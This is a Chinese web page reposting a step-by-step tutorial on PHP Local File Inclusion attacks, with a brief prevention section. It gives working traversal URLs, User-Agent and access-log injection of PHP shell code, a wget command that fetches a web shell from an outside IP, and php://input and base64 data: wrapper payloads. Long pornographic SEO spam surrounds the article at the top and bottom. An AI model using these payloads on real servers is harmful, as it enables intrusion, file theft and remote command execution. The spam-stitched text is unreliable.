精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

LFI(Local File Include)攻擊的捕獲與預(yù)防方法

安全 黑客攻防
怎樣通過LFI(Local File Include,本地文件包含)攻擊?第一步:尋找本地包含漏洞;第二步:檢查proc/self/environ是否可用訪問。

剛剛從網(wǎng)站訪問日志中捕獲LFI(Local File Include,本地文件包含)攻擊,攻擊參數(shù)為../../../../../../../../../../../../..//proc/self/environ00,攻擊截圖如下:

捕獲LFI攻擊-Local File Include本地文件包含

怎樣通過LFI(Local File Include,本地文件包含)攻擊?

第一步:尋找本地包含漏洞

首先找到一個(gè)可能存在本地包含的文件,去check它

比如: www.website.com/view.php?page=contact.php

替換成 www.website.com/view.php?page=../

我們得到一個(gè)錯(cuò)誤

1 Warning: include(../) [function.include]: failed to open stream: No such fileor directory in /home/sirgod/public_html/website.com/view.php on line 1337

翻譯下以上的錯(cuò)誤信息如下:

警告:包括(../) [function.include]:未能打開流:沒有那個(gè)文件或目錄在/home/sirgod/public_html/website.com/view.php

說明機(jī)會(huì)很大,只是不存在文件而已

那么我們就針對服務(wù)器存在的文件做檢查,比如linux里的/etc/passwd

提交

1 url:www.website.com/view.php?page=../../../etc/passwd

依舊是:

1 Warning: include(../) [function.include]: failed to open stream: No such fileor directory in /home/sirgod/public_html/website.com/view.php on line 1337

所以我們一層層的加上../測試,直到顯示為止

1 www.website.com/view.php?page=../../../../../etc/passwd

這個(gè)時(shí)候我們成功的包含了/etc/passwd

1 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0perator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

第二步:檢查proc/self/environ是否可用訪問

提交

1 url:www.website.com/view.php?page=../../../../../proc/self/environ

如果看到類似如下信息:

1 DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=../../../../../../proc/self/environ REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=../../../../../../proc/self/environ SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=

2 Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80

說明是可以訪問的,如果返回時(shí)個(gè)空白頁,說明是無法訪問的,也可能操作系統(tǒng)是FreeBSD

第三步: 注入惡意代碼

我們怎么才能把我們的惡意代碼注入到proc/self/environ呢?

我們可以注入我們的代碼在用戶代理HTTP頭。

使用篡改數(shù)據(jù)用于Firefox的插件改變Firefox的User-Agent.Start篡改數(shù)據(jù)和請求URL:

1 www.website.com/view.php?page=../../../../../proc/self/environ

選擇User-Agent 寫代碼如下:

1 <?system('wget http://61.164.38.24/rfi.txt -O hack.php');?>

或者

1 <?php copy('http://61.164.38.24/rfi.txt', 'hack.php') ?>

然后提交請求。

我們的命令將被執(zhí)行(將下載http://hack-bay.com/Shells/gny.txt,并將其保存為它在shell.php

網(wǎng)站目錄),我們的shell也就被創(chuàng)建,.如果不行,嘗試使用exec(),因?yàn)橄到y(tǒng)可能被禁用的從php.ini網(wǎng)絡(luò)服務(wù)器.

第四步:訪問我們的shell

預(yù)防LFI攻擊的方法

1.涉及到的危險(xiǎn)函數(shù)(include(),require()和include_once(),require_once())

在這些函數(shù)調(diào)用時(shí),盡量采用明確參數(shù),如果使用變量做參數(shù)則變量必須明確初始化,防止變量被通過URL改變賦值。

2.禁用system等危險(xiǎn)php函數(shù)。

PHP包含漏洞是怎樣產(chǎn)生的?

php包含漏洞替代技術(shù)

php開發(fā)者們犯得一個(gè)基本的錯(cuò)誤是把一個(gè)不正當(dāng)?shù)淖兞總鬟f給系統(tǒng)函數(shù),特別是include()和require()這兩個(gè)函數(shù)。

這個(gè)常見的錯(cuò)誤導(dǎo)致了眾所周知的遠(yuǎn)程文件包含漏洞和本地文件包含漏洞。在過去的幾年中,php已經(jīng)開始試圖通過缺省設(shè)置來消除或限制這種漏洞的所帶來影響。

但即使是簡單的本地文件包含,也會(huì)有新的技術(shù)去利用這些漏洞來導(dǎo)致遠(yuǎn)程命令的執(zhí)行。

介紹php包含漏洞

文件包含漏洞的要點(diǎn)是要去找到一個(gè)方法來包含帶有你的php惡意代碼的文件。

<?php

include($_GET['content']);

 ?>

http://target/index.php?content=/etc/passwd

 http://target/index.php?content=http://trojan/exec.php

這是第一個(gè)例子,它包含了本地文件/etc/pa sswd第二個(gè)例子包含了一個(gè)遠(yuǎn)程文件,這個(gè)遠(yuǎn)程包含文件在大多數(shù)情況下不能使用,因?yàn)閜hp設(shè)置中的allow_url_fopen默認(rèn)是off。

當(dāng)然,通常有此漏洞的php代碼會(huì)比上面的例子更有限制性,通常是通過在前面加上一個(gè)目錄,防止遠(yuǎn)程文件包含,前面加一個(gè)文件擴(kuò)展名來限制可以包含哪些類型的文件。

<?php

include("pages/".$_GET['content'].".php");

?>

 http://target/index.php?content=../../../etc/passwd%00

…/的使用允許目錄橫向風(fēng)格的操作,使你可以操作代碼中預(yù)定目錄以外的目錄的文件。

如果php設(shè)置中open_basedir為on,它將會(huì)阻止你繞過過多的目錄。

網(wǎng)站的開發(fā)者有可能也會(huì)使用一些函數(shù)來過濾掉來自用戶提交的惡意數(shù)據(jù),但并非總是如此。

空字節(jié)字符%00(\0)終止字符串,來切斷在它之后提交的任何東西,即是當(dāng)magic_quotes_gpc 默認(rèn)為on的時(shí)候,也可以逃過。

在http://ush.it網(wǎng)站中有一篇名為《PHP文件系統(tǒng)的攻擊媒介》提供了可能的方法來應(yīng)付空字節(jié)字符。

php腳本安全也可能取決于像$_GLOBAL[]或$_SERVER[]等的變量,像最近被發(fā)現(xiàn)的phplist的漏洞(phplist是一款國外的Email程序),例子為

http://target/phplist/admin/?_SERVER[ConfigFile]=/etc/passwd

本地文件包含致遠(yuǎn)程代碼執(zhí)行

一次你找到一個(gè)本地包含漏洞,你需要找到一個(gè)方法去把你的惡意php代碼插入一個(gè)文件中,大量的技術(shù)在過去的幾年中出現(xiàn)。

有一種在服務(wù)日志中去注入php代碼的技術(shù)比上面這些包含漏洞要出現(xiàn)的晚。

它是有可能的去把我們的代碼插入http請求的頭部,然后包含Apache的access_log日志文件(它可能會(huì)進(jìn)行一些測試去找到access_log)。

考慮一下這個(gè)例子,在Mac OS X的Apache/PHP默認(rèn)配置下,寫一個(gè)腳本去發(fā)送一個(gè)請求可能是必須的,因?yàn)闉g覽器可能會(huì)對一些字符進(jìn)行轉(zhuǎn)義。

  1. <?php  
  2. $a = fsockopen("localhost",80);  
  3. fwrite($a,"GET /<?php passthru(\$_GET['cmd']); ?> HTTP/1.1\r\n".  
  4. "Host: localhost\r\n".  
  5. "Connection: Close\r\n\r\n");  
  6. fclose($a);  
  7. ?>  
  8. http://localhost/index.php?content=/var/log/httpd/access_log&cmd=id 

另一種方法是包括了Apache/PHP進(jìn)程的環(huán)境變量的/proc/ self/environ文件。

如果我們將惡意代碼插入U(xiǎn)ser-Agent 的頭部,這些代碼會(huì)出現(xiàn)在那個(gè)文件里,所以遠(yuǎn)程執(zhí)行代碼是可能的。

/proc/self/environ必須是可讀的

  1.  <?php 
  2.  $a = fsockopen("localhost",80);  
  3. fwrite($a,"GET /../../../../proc/self/environ HTTP/1.1\r\n".  
  4. "User-Agent: <?php passthru(\$_GET['cmd']); ?>\r\n".  
  5. "Host: localhost\r\n".  
  6. "Connection: Close\r\n\r\n");  
  7. fclose($a);  
  8. ?> 

Php封裝包含漏洞

利用php的include函數(shù)的另一種方法是利用php封裝(http://www.php.net/wrappers.php)。這個(gè)例子將使用PHP輸入,從一個(gè)HTTP POST請求的原始數(shù)據(jù)并執(zhí)行它:

漏洞代碼:

  1. 1 <?php  
  2. include($_GET['content']);  
  3. 3 ?>  
  4. 我們的請求:  
  5. 01 <?php  
  6. 02 $request = "<?php passthru('id;');?>";  
  7. 03 $req = "POST /index.php?content=php://input  
  8. 04 HTTP/1.1\r\n".  
  9. 05 "Host: localhost\r\n".  
  10. 06 "Content-type: text/html\r\n".  
  11. 07 "Content-length: ".strlen($request)."\r\n".  
  12. 08 "Connection: Close\r\n\r\n".  
  13. 09 "$request \r\n\r\n";  
  14. 10 $a = fsockopen("10.0.2.2",80);  
  15. 11 fwrite($a,$req);  
  16. 12 echo $req;  
  17. 13 while (!feof($a)){echo fgets($a, 128);}  
  18. 14 fclose($a);  
  19. 15 ?> 

得到的結(jié)果:uid=33(www-data) gid=33(www-data) groups=33(www-data)

這個(gè)例子的前提是allow_url_include和allow_fopen_include兩個(gè)選項(xiàng)設(shè)置為ON,在這種情況下,標(biāo)準(zhǔn)的遠(yuǎn)程文件包含是可能的。

這個(gè)方法的優(yōu)點(diǎn)是它不依賴于外部儲(chǔ)存文件服務(wù)器。

cr0w-at.blogspot.com提到另一種技術(shù)使用”數(shù)據(jù):”封裝:

1 index.php?content=data:,<?php system($_GET[c]);?>?&c=dir

或者base64編碼過的:

1 index.php?content=data:;base64,\PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4=&c=dir

總結(jié)

這些方法大多都不是新的,并沒有表現(xiàn)出缺陷或在PHP語言本身的局限性。這些問題通常可以通過強(qiáng)大的輸入驗(yàn)證,常識(shí)編碼,和一些預(yù)防更嚴(yán)格的服務(wù)器配置。

責(zé)任編輯:藍(lán)雨淚 來源: 紅黑聯(lián)盟
相關(guān)推薦

2021-12-13 09:41:28

DNS污染攻擊網(wǎng)絡(luò)安全

2021-10-03 15:50:06

網(wǎng)絡(luò)釣魚病毒黑客

2013-01-10 18:00:09

2025-07-29 07:23:32

2022-12-15 08:00:00

2010-09-16 21:20:02

2011-10-19 10:47:56

2022-02-14 17:13:46

攻擊面管理網(wǎng)絡(luò)安全

2025-02-24 00:00:03

DDoS攻擊工具

2010-09-14 16:28:52

2011-07-12 10:38:10

2020-08-29 19:06:18

水坑攻擊惡意軟件網(wǎng)絡(luò)攻擊

2009-08-13 17:25:16

2019-12-10 08:50:27

網(wǎng)絡(luò)攻擊網(wǎng)絡(luò)安全漏洞

2009-09-23 10:43:22

2021-06-11 05:24:45

Web網(wǎng)絡(luò)攻擊預(yù)防講解

2023-07-21 11:53:27

2019-12-24 08:29:56

社會(huì)工程學(xué)網(wǎng)絡(luò)攻擊漏洞

2012-11-13 11:29:30

2023-10-11 15:13:11

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號

国产精品我不卡| 最新亚洲国产精品| 亚洲熟妇av日韩熟妇在线| 天天综合永久入口| 青青草97国产精品免费观看 | 亚洲国产精品欧美一二99| 精品国产一区二区三区日日嗨| 中文文字幕一区二区三三| 欧美一区高清| 日韩精品一区二区视频| www.成人黄色| 亚洲国产成人二区| 亚洲精品免费播放| 日韩激情视频| 欧日韩在线视频| 麻豆精品视频在线| 国产91成人video| 波多野结衣久久久久| 麻豆视频一区| 91精品国产乱码久久蜜臀| 激情综合在线观看| 欧美亚洲系列| 国产精品高清亚洲| 欧美日韩一区二区三| 精品国自产拍在线观看| 奇米影视一区二区三区小说| 性日韩欧美在线视频| 日本一二三区在线观看| 亚洲欧洲免费| 亚洲第一色在线| 精品久久久99| 国产韩日精品| 色综合激情五月| 亚洲熟妇无码一区二区三区导航| 乱人伦中文视频在线| 久久精子c满五个校花| 国产伦精品一区二区三区高清版| 国产绿帽刺激高潮对白| 蜜桃一区二区三区在线| 日韩av理论片| 在线观看 中文字幕| 一区二区在线| 久久久91精品国产| 欧美性生交大片| 第一sis亚洲原创| 亚洲欧美日韩精品久久| 日本黄色动态图| 无码国模国产在线观看| 欧美一区二区三区四区视频 | 国产高清不卡一区二区| 成人黄色短视频在线观看| 久久国产香蕉视频| 日本一区中文字幕| 国产精品欧美风情| 国产一级精品毛片| 免费观看久久久4p| 国产噜噜噜噜久久久久久久久| 国产精品尤物视频| 日韩vs国产vs欧美| 国产精品网站大全| 国产精品视频第一页| 国精品**一区二区三区在线蜜桃| 国产日韩欧美中文在线播放| 亚洲一二区视频| 久久99热国产| 亚洲伊人成综合成人网| 性做久久久久久久久久| 国产精品一区2区| 成人免费视频网站| 手机av免费在线观看| 91在线免费视频观看| 欧美第一黄网| av大片在线观看| 亚洲欧美国产77777| 草草草视频在线观看| yellow字幕网在线| 色综合色综合色综合色综合色综合| 黄色一级一级片| 九色成人搞黄网站| 日韩午夜激情av| 怡红院一区二区| 婷婷激情久久| 色哟哟网站入口亚洲精品| 麻豆明星ai换脸视频| 亚洲国产专区校园欧美| 秋霞av国产精品一区| 亚洲一级在线播放| 国产91精品精华液一区二区三区 | 国产二区视频在线观看| 中文字幕制服丝袜成人av | 亚洲丝袜精品| 福利一区福利二区微拍刺激| www.色就是色| 亚洲国产欧美国产第一区| 日韩激情av在线播放| 瑟瑟视频在线观看| 午夜精品毛片| 欧美专区国产专区| 国产麻豆免费观看| 26uuu亚洲| 免费的av在线| 神马久久资源| 日韩一级视频免费观看在线| 国产亚洲色婷婷久久99精品91| 日韩欧美中文| 97久久精品人搡人人玩| 97精品久久人人爽人人爽| 成人高清视频在线观看| 在线精品亚洲一区二区| 天堂av中文在线观看| 欧美一区二视频| 30一40一50老女人毛片| 一区二区在线| 国产免费亚洲高清| 无码国产伦一区二区三区视频| 最近中文字幕一区二区三区| 18岁视频在线观看| 成人精品毛片| 美女少妇精品视频| 亚洲网站免费观看| 久久伊99综合婷婷久久伊| 免费看日b视频| 成人精品三级| 日韩精品一区二区视频| 国产真实夫妇交换视频| 国产精品996| 亚洲一区二区三区免费看| 特黄毛片在线观看| 亚洲丁香婷深爱综合| 在线免费日韩av| 久久精品国产99国产精品| 欧美一区国产一区| av福利在线导航| 日韩欧美在线网站| 亚洲熟女少妇一区二区| 免费成人av在线播放| 欧美三级华人主播| 91精品论坛| 日韩高清免费在线| 国产乡下妇女做爰毛片| 国产精品99久久久久久似苏梦涵| 亚洲巨乳在线观看| a屁视频一区二区三区四区| 亚洲男人天堂2024| av黄色在线播放| 91在线视频观看| 黄在线观看网站| 亚洲日产av中文字幕| 38少妇精品导航| 性xxxx视频| 精品久久久久久电影| 中文字幕5566| 视频一区国产视频| 日本日本精品二区免费| 精品欧美一区二区三区在线观看 | av免费在线网站| 777精品伊人久久久久大香线蕉| 国产三级精品三级观看| 国内久久婷婷综合| 日本xxxxx18| 这里视频有精品| 欧美激情网站在线观看| 欧美 日韩 国产 成人 在线 91| 亚洲一区二区3| 久久精品女同亚洲女同13| 99精品国产99久久久久久福利| 国产一区二区在线网站| 成人欧美magnet| 伊人av综合网| 国产乱淫片视频| 亚洲一区在线视频观看| 日本xxxx裸体xxxx| 久久久久网站| 中日韩在线视频| 一区二区三区国产好| 国语自产在线不卡| 国产一区二区三区福利| 欧美日韩午夜在线| 天天看片中文字幕| 99久久国产综合精品色伊| 苍井空浴缸大战猛男120分钟| 日韩精品91| 亚洲综合一区二区不卡| 忘忧草在线日韩www影院| 一区二区三区四区视频| 亚洲爱情岛论坛永久| 日韩欧美亚洲综合| 99热这里只有精品4| 波波电影院一区二区三区| 国产成人无码一二三区视频| 成人3d动漫在线观看| 97人人澡人人爽| 毛片无码国产| 久久在精品线影院精品国产| 亚洲AV成人无码一二三区在线| 欧美在线观看18| 国产真实夫妇交换视频| 国产精品美女久久久久aⅴ| 4438x全国最大成人| 日韩中文字幕一区二区三区| 日本黄网站色大片免费观看| 三级小说欧洲区亚洲区| 成人女保姆的销魂服务| 日韩在线伦理| 色综合天天狠天天透天天伊人| 男人av在线| 精品国产欧美一区二区| 在线观看国产小视频| 精品人伦一区二区三区蜜桃网站 | 天堂а√在线8种子蜜桃视频| 欧美午夜片在线观看| 日本一级黄色大片| 亚洲乱码中文字幕| 国产91丝袜美女在线播放| 成人99免费视频| 手机看片国产精品| 免费成人在线观看| 亚洲熟女乱色一区二区三区| 欧美a级片网站| 亚洲成人自拍视频| 亚洲黄色录像| 国产在线精品一区| 亚洲国产一区二区三区网站| 国产欧美一区二区白浆黑人| 一区二区三区短视频| 久久久噜噜噜久久久| www免费在线观看| 日韩视频亚洲视频| 黄色软件在线| 亚洲欧美激情在线视频| 少妇一区二区三区四区| 日韩美一区二区三区| 国产精品一级二级| 欧美日本一区二区| 最近中文字幕av| 在线观看日韩毛片| 国产91精品一区| 疯狂蹂躏欧美一区二区精品| 国产精品suv一区二区69| 亚洲精品国久久99热| 小向美奈子av| 亚洲欧美偷拍三级| 久草综合在线视频| 国产精品福利影院| 最新日韩免费视频| 最新欧美精品一区二区三区| 手机av在线看| 亚洲欧美激情视频在线观看一区二区三区 | 欧美日韩中文字幕在线播放| 国产精品97| 免费观看国产视频在线| 91精品国产乱码久久久久久| 一级一片免费播放| 亚洲经典一区| 日韩在线视频在线| 很黄很黄激情成人| 国产精品12345| 国产精品腿扒开做爽爽爽挤奶网站| 国产男女在线观看| 日韩高清在线不卡| 天天色天天综合网| 国产精品一二三| 亚洲一区二区在线免费| 91丝袜美腿高跟国产极品老师| 亚洲永久无码7777kkk| 久久久精品免费观看| 日韩影视一区二区三区| 最新中文字幕一区二区三区| 久久中文字幕无码| 欧美性猛交xxxxx水多| 国产裸体美女永久免费无遮挡| 欧美日韩欧美一区二区| 999久久久久| 亚洲国产私拍精品国模在线观看| 欧美捆绑视频| 色爱精品视频一区| 宅男在线观看免费高清网站| 91精品国产91久久久久福利| 国产精品毛片久久久久久久久久99999999| 国产精品爽爽爽爽爽爽在线观看| 精品国产亚洲一区二区在线观看| 99在线观看视频网站| 欧美一区二区三区红桃小说| 日本精品一区| 欧美午夜视频| 久章草在线视频| 久久99热这里只有精品| 欧产日产国产精品98| 欧美韩日一区二区三区| 欧美日韩国产精品综合| 欧美性精品220| 国产美女www爽爽爽视频| 亚洲精品美女久久久| 欧美a免费在线| 91精品国产91久久久久| 在线不卡一区| 欧美日韩系列| 亚洲成人原创| 特黄视频免费观看| 99久久伊人网影院| 免费看特级毛片| 一本久道久久综合中文字幕| 精品国产免费无码久久久| 亚洲欧洲高清在线| 色爱综合区网| 国产精品久久久久久久久影视 | 日本不卡在线视频| 久久人妻少妇嫩草av蜜桃| 亚洲国产高清aⅴ视频| 国产精品成人国产乱| 制服丝袜中文字幕一区| 高清毛片在线看| 欧美亚洲日本网站| 亚洲视频国产精品| 一区二区视频在线播放| 久久午夜影视| 怡红院一区二区| 一区二区高清免费观看影视大全| 五月婷婷激情五月| 精品无码久久久久久国产| 视频在线这里都是精品| 国产又爽又黄的激情精品视频| 精品国产99| 青青草原成人网| 成人午夜在线视频| 老女人性淫交视频| 在线成人免费视频| 在线观看精品一区二区三区| 国产成人福利网站| 羞羞答答一区二区| 六月婷婷在线视频| 高清不卡一区二区| 欧美日韩亚洲国产另类| 欧美精品xxxxbbbb| 在线视频婷婷| 国产精品免费网站| 国产精品一区二区av交换| 草草久久久无码国产专区| 不卡的电视剧免费网站有什么| 麻豆影视在线播放| 日韩亚洲欧美中文三级| 91小视频xxxx网站在线| 成人精品一区二区三区电影免费 | 91老师片黄在线观看| 日本亚洲欧美在线| 日韩成人av网址| 亚洲美女尤物影院| 欧美日韩综合久久| 日韩精品91亚洲二区在线观看| 亚洲精品国产91| 91久久精品网| 日本中文在线| 91久久国产综合久久91精品网站| 亚洲不卡av不卡一区二区| 色综合五月婷婷| 亚洲黄色免费电影| 欧美一区二区三区成人片在线| 久久久久亚洲精品国产| 加勒比色老久久爱综合网| 青青草精品视频在线| www久久精品| 无码久久精品国产亚洲av影片| 中文字幕成人在线| 亚洲精品无播放器在线播放| a级网站在线观看| 国产成a人亚洲| √资源天堂中文在线| 在线电影av不卡网址| 国产精品白丝久久av网站| 成年人深夜视频| 91久色porny| 亚洲一级在线播放| 久久久久久久一区二区| 久久99视频| 激情在线观看视频| 午夜视频在线观看一区二区三区| 牛牛影视精品影视| 国产一区红桃视频| 日韩午夜精品| 91视频免费看片| 亚洲第一综合天堂另类专| 亚洲成av在线| 激情五月六月婷婷| 国产日韩成人精品| 亚洲av色香蕉一区二区三区| 国产97色在线|日韩| 欧美暴力喷水在线| 精品少妇人妻一区二区黑料社区| 在线91免费看| 中文字幕在线免费观看视频| 黄色高清视频网站| 97aⅴ精品视频一二三区| 国产精品久久777777换脸| 久久免费少妇高潮久久精品99| 精品国产91| 男人网站在线观看| 欧美日韩不卡一区| 国产美女精品写真福利视频| 国产又大又长又粗又黄| 久久免费美女视频|